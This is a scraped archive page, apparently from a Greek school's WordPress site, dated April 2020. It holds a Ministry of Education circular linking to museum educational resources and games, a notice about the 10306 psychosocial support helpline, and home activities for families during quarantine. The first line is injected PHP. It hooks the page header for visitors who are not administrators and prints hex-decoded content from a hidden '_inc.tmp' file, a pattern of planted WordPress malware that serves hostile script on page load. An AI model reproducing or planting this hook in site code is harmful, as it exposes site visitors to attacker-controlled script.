if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Απρίλιος, 2020 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Απρίλιος 2020

Σύνδεσμοι από μουσεία και άλλους φορείς με εκπαιδευτικό υλικό και εκπαιδευτικά παιχνίδια

ΘΕΜΑ: Ανάρτηση σε ιστοσελίδες του Υ.ΠΑΙ.Θ. συνδέσμων από μουσεία και άλλους φορείς με εκπαιδευτικό υλικό και εκπαιδευτικά παιχνίδια
Σχετ : το με αρ. πρωτ. 43985/07-04-2020 εισερχόμενο έγγραφο του Υ.ΠΑΙ.Θ.
Σας ενημερώνουμε σχετικά με την ανάρτηση σε ιστοσελίδες του Υ.ΠΑΙ.Θ. συνδέσμων από μουσεία και άλλους φορείς, προκειμένου οι μαθητές και οι μαθήτριες, κατά τη διάρκεια αναστολής της λειτουργίας των σχολείων, να έρθουν σε επαφή και να αξιοποιήσουν διαθέσιμο εκπαιδευτικό υλικό και εκπαιδευτικά παιχνίδια. Οι εν λόγω σύνδεσμοι αναφέρονται όπως παρακάτω και σημειώνεται ότι αυτοί θα ανανεώνονται συνέχεια με νεότερες εγκυκλίους. ΜΟΥΣΕΙΑΚΗ ΕΚΠΑΙΔΕΥΣΗ
Α) Μουσείο Ακρόπολης – Εκπαιδευτικό Υλικό – Κεντρική Σελίδα
https://www.theacropolismuseum.gr/el/content/ekpaideftiko-yliko Επιλεγμένα στοιχεία από την κεντρική σελίδα
Διαδραστικά Παιχνίδια:

https://www.theacropolismuseum.gr/peploforos/
http://www.acropolis-athena.gr/
http://www.parthenonfrieze.gr/#/home
http://acropolisvirtualtour.gr/theglafkaproject/#/el/home
Εκπαιδευτικό Αποθετήριο http://repository.acropolis-education.gr/acr_edu/?locale=el
Β) Μουσείο Κυκλαδικής Τέχνης http://repository-mca.ekt.gr/mca/
Γ) Εθνική Πινακοθήκη, Μουσείο Αλεξάνδρου Σούτσου
ttps://www.hnationalgallery.gr/el/ekpaideusi/paihnidia.html

Δ) Εθνικό Ιστορικό Μουσείο
http://www.nhmuseum.gr/el/ekpaideysi/psifiaka-paihnidia/
Ε) Μουσείο της Πόλεως των Αθηνών – Ίδρυμα Βούρου-Ευταξία

Αρχική


ΣΤ) Φιλαναγνωσία
https://ereading.nlg.gr/el/?server=1
Παρακαλούνται οι αποδέκτες της παρούσας να ενημερώσουν άμεσα όλους τους/τις εκπαιδευτικούς Π.Ε. και Δ.Ε. της χώρας, προκειμένου να μεριμνήσουν για την ενημέρωση των μαθητών/τριών και των γονέων/κηδεμόνων.

ΑΚΡΙΒΕΣ ΑΝΤΙΓΡΑΦΟ
Η ΥΦΥΠΟΥΡΓΟΣ ΠΑΙΔΕΙΑΣ ΚΑΙ ΘΡΗΣΚΕΥΜΑΤΩΝ
ΣΟΦΙΑ ΖΑΧΑΡΑΚΗ

ΝΕΑ ΓΡΑΜΜΗ ΨΥΧΟΚΟΙΝΩΝΙΚΗΣ ΥΠΟΣΤΗΡΙΞΗΣ 10306

ΥΠΟΥΡΓΕΙΟ ΥΓΕΙΑΣ & ΕΚΠΑ

ΝΕΑ ΓΡΑΜΜΗ ΨΥΧΟΚΟΙΝΩΝΙΚΗΣ ΥΠΟΣΤΗΡΙΞΗΣ 10306

 

Οι πολίτες, όταν νοιώσουν την ανάγκη, μπορούν να

 καλέσουν στην τηλεφωνική γραμμή 10306,

όπου θα έχουν τις παρακάτω επιλογές:

 

1. Παροχή ψυχολογικής στήριξης: 24ωρη λειτουργία.

2. Παροχή ψυχιατρικής βοήθειας σε πάσχοντες από ψυχικό νόσημα: λειτουργία από 08.00 έως 20.00.

3. Παροχή ψυχολογικής στήριξης παιδιών και οικογενειών: 24ωρη λειτουργία.

4. Παροχή ψυχολογικής στήριξης υγειονομικού προσωπικού: λειτουργία από 08.00 έως 20.00

5. Παροχή κοινωνικής στήριξης: λειτουργία από 08.00 έως 20.00.

ΔΡΑΣΤΗΡΙΟΤΗΤΕΣ ΓΙΑ ΜΑΘΗΤΕΣ ΚΑΙ ΓΟΝΕΙΣ ΣΤΗΝ ΕΠΟΧΗ ΤΗΣ ΚΑΡΑΝΤΙΝΑΣ

Πρακτικές προτάσεις δραστηριοτήτων για όλη την οικογένεια εντός του σπιτιού χωρισμένες σε κατηγορίες (κάποιες από τις κατηγορίες αλληλοκαλύπτονται)

 

Α) Δραστηριότητες εκτόνωσης – ενσυναίσθησης – εκδήλωσης συναισθημάτων  

  1. Κάντε γυμναστική. Η σωματική άσκηση είναι ωφέλιμη τόσο για το σώμα όσο και για την ψυχολογία μας. Βοηθά στο να παραμένουμε ήρεμοι ψυχικά και ενεργοί σωματικά. Επιλέξτε τον τύπο άσκησης που σας ταιριάζει ή οργανώστε ομαδικές δραστηριότητες
  2. Θεατρικό παιχνίδι για τον κορονοϊό, για παράδειγμα ένα από τα μέλη της οικογένειας παριστάνει τον κορονοϊό, χτυπάει την πόρτα του δωματίου του παιδιού παριστάνοντας ότι θέλει να μπει μέσα, πλησιάζει το παιδί κάνοντας ότι θέλει να το πάρει αγκαλιά, του απλώνει το χέρι για χειραψία, κυνηγάει το παιδί μέσα στο σπίτι. Ζητάμε από το παιδί να αντιδράσει σε όλα αυτά με τον κατάλληλο – παιγνιώδη τρόπο.
  3. Διοργανώνουμε βραδιές κάμπινγκ ή πικνίκ ή «στρωματσάδας» (στρώνουμε κουβέρτες στο πάτωμα και κοιμόμαστε όλοι μαζί λέγοντας παραμύθια ή ιστορίες ο ένας στον άλλον) σε διάφορα μέρη του σπιτιού (έχουμε μαγειρέψει μαζί το φαγητό και έχουμε προσαρμόσει τον χώρο του σπιτιού ανάλογα). Ζωγραφίζουμε το πλαστικό γάντι (που φοράμε για προφύλαξη) με φατσούλες συναισθημάτων (χαρούμενη, λυπημένη, θυμωμένη κ.τ.λ.), λέμε πώς αισθάνεται η κάθε φατσούλα και παίζουμε «δαχτυλοθέατρο».
  4. Δημιουργούμε μία κοινωνική ιστορία, για παράδειγμα ένα από τα μέλη της οικογένειας υποδύεται τον «νταή» του σχολείου και τα υπόλοιπα μέλη προσπαθούν να τον αντιμετωπίσουν. Ξεκινάμε φανταστικές ιστορίες που πρέπει να συνεχίσουν τα παιδιά, για παράδειγμα λέει ο καθένας από μία πρόταση για να φτιάξουμε όλοι μαζί μία ιστορία ή ένα παραμύθι.
  5. Φτιάχνουμε ένα παιχνίδι μυστηρίου, φαντασίας, παραδείγματος χάριν μεταφερόμαστε με μία χρονοκάψουλα τριάντα χρόνια μπροστά στον πλανήτη Άρη και φανταζόμαστε πώς θα είναι ο πλανήτης και τι συμβαίνει εκεί.
  6. Σκαρφιζόμαστε αστυνομικές ιστορίες με κλέφτες και αστυνόμους και τα παιδιά πρέπει να βρουν το κρυμμένο αντικείμενο μέσα στο σπίτι.
  7. Φοράμε επίσημο ένδυμα και διοργανώνουμε συναυλία χρησιμοποιώντας ως όργανα το σώμα μας ή τα κουζινικά του σπιτιού.
  8. Αλλάζουμε ρόλους με τους γονείς, για παράδειγμα για ορισμένο χρονικό διάστημα γίνονται τα παιδιά γονείς και οι γονείς παιδιά (συμβουλή: οι γονείς να αντιδρούν σαν να είναι πραγματικά παιδιά).
  9. Βάζουμε δυνατά μουσική και χορεύουμε και τραγουδάμε.
  10. Φτιάχνουμε τα δικά μας οικογενειακά τραγούδια.
  11. Παίζουμε παντομίμα με τίτλους από ταινίες, σειρές ή βιβλία.
  12. Χρησιμοποιούμε τα καλλυντικά της μαμάς για να βάψουμε αστεία τα πρόσωπά μας (όλοι μας, και ο μπαμπάς).
  13. Αλλάζουμε ρούχα μεταξύ μας ή χρησιμοποιούμε παλιές στολές από τις απόκριες.
  14. Παίζουμε μαξιλαροπόλεμο.

Β) Δραστηριότητες δεξιοτήτων  

  1. Ράβουμε μάσκες και τις ζωγραφίζουμε (μαθαίνουμε πώς και γιατί χρησιμοποιούμε μάσκες).
  2. Φτιάχνουμε καλτσόκουκλες και παίζουμε κουκλοθέατρο.
  3. Μαθαίνουμε στα παιδιά μας δουλειές του σπιτιού και τα παιδιά αναλαμβάνουν συγκεκριμένες καθημερινές αρμοδιότητες μέσα στο σπίτι.
  4. Μαγειρεύουμε και φτιάχνουμε γλυκά μαζί τους.
  5. Μαθαίνουμε να δένουμε τα κορδόνια μας, να λούζουμε τα μαλλιά μας, να κάνουμε μόνοι μας μπάνιο. Φτιάχνουμε κοσμήματα με μακαρόνια ή κολάζ με φακές, φασόλια, κοφτό μακαρονάκι, κομμάτια υφάσματος κ.τ.λ.
  6. Παίζουμε τυφλόμυγα με γεύση και αφή: κλείνουμε τα μάτια των παιδιών και τα βάζουμε να αγγίξουν ή να γευτούν και να ανακαλύψουν τι ήταν αυτό που άγγιξαν ή γεύτηκαν.
  7. Βάζουμε ήχους στο διαδίκτυο και βάζουμε τα παιδιά να μαντέψουν ποια είναι η πηγή του κάθε ήχου.

 

Γ) Δραστηριότητες γνώσεων – μαθησιακές  

 

  1. Παίζουμε κρεμάλα. Ψάχνουμε λέξεις που να ξεκινούν από συγκεκριμένο γράμμα (π.χ. από «α») ή να τελειώνουν σε συγκεκριμένη κατάληξη (π.χ. σε –ος).Ψάχνουμε ουσιαστικά που βρίσκονται μέσα στο δωμάτιο. Δημιουργούμε ρήματα με τις πράξεις μας.
  2. Κανονίζουμε ώρες σιωπής και επικοινωνούμε μεταξύ μας μόνο με μηνύματα σε χαρτί (ορθογραφία – γραπτός λόγος).
  3. Φτιάχνουμε το οικογενειακό μας δέντρο, βρίσκουμε παλιές οικογενειακές φωτογραφίες, μιλάμε στα παιδιά μας για τους προγόνους τους και για τους τρόπους ζωής τα παλαιότερα χρόνια. Με αυτό τον τρόπο γνωρίζουν και την ιστορία του τόπου τους, καθώς και τις οικογενειακές τους ρίζες.
  4. Κάνουμε πειράματα φυσικής ή χημείας στην κουζίνα, για παράδειγμα κατασκευή ηφαιστείου που εκρήγνυται με κόκα κόλα και μέντα.
  5. Γίνονται τα παιδιά δάσκαλοι και διδάσκουν στους γονείς κάποιο μάθημα που έχουν διαβάσει (προσοχή: οι γονείς πρέπει να συμπεριφέρονται σαν να είναι παιδιά). Με αυτό τον τρόπο αυξάνουμε την ενσυναίσθηση και στα παιδιά και στους γονείς.
  6. Παίζουμε το μπακάλικο ή το περίπτερο και μαθαίνουμε στα παιδιά να διαχειρίζονται τα χρήματα.
  7. Παίζουμε συνώνυμα – αντίθετα – ετυμολογίες λέξεων.
  8. Παίζουμε όνομα – ζώο – φυτό – επάγγελμα – πράγμα.
  9. Βρίσκουμε στο διαδίκτυο γρίφους, αινίγματα και γλωσσοδέτες. Εμπλέκουμε τα παιδιά στη διαδικασία επίλυσής τους.

Μην ξεχνάτε πως οτιδήποτε συνηθισμένο αντικείμενο μέσα στο σπίτι μπορεί να χρησιμοποιηθεί για ασυνήθιστα και διασκεδαστικά παιχνίδια με τα παιδιά μας. Αφήστε τη φαντασία και τη δημιουργικότητά σας ελεύθερη, ξαναθυμηθείτε το παιδί που έχετε μέσα σας και δημιουργείστε τα δικά σας παιχνίδια μαζί με την οικογένειά σας.

 

 

Δημιουργήστε ένα καθημερινό πρόγραμμα της οικογένειας, φτιάξτε όλοι μαζί μια αφίσα με τις προτεινόμενες δραστηριότητες και το χρόνο εκτέλεσης τους. Μην αφήνετε το χρόνο να κυλά άσκοπα, τώρα που τα σχολεία είναι κλειστά. Γεμίστε την ημέρα σας με δραστηριότητες που σας ευχαριστούν και σας φέρνουν κοντά ως οικογένεια. Μην ξεχνάτε, το διάβασμα δε σταμάτησε, απλώς γίνεται στο σπίτι!

 

Το Υπουργείο Παιδείας και Θρησκευμάτων στηρίζει την εκπαιδευτική κοινότητα με καινοτόμα εργαλεία εξ αποστάσεως εκπαίδευσης.

Το Υπουργείο Παιδείας και Θρησκευμάτων στηρίζει την εκπαιδευτική κοινότητα με καινοτόμα εργαλεία εξ αποστάσεως εκπαίδευσης.